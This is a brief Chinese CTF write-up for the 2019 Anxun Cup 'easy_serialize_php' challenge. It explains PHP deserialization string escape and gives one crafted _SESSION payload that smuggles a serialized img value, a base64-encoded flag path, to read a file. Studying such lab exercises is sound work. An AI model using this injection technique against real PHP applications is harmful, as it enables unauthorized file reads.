[安洵杯 2019]easy_serialize_php

发布时间 2023-10-14 11:47:29作者: 圆弧状态

原理

反序列化字符串逃逸

解题过程

跟sql拼接差不多

_SESSION['imgflagphp']=;s:1:"1";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}

参考文章:https://blog.csdn.net/weixin_52585514/article/details/124291588
https://xz.aliyun.com/t/9895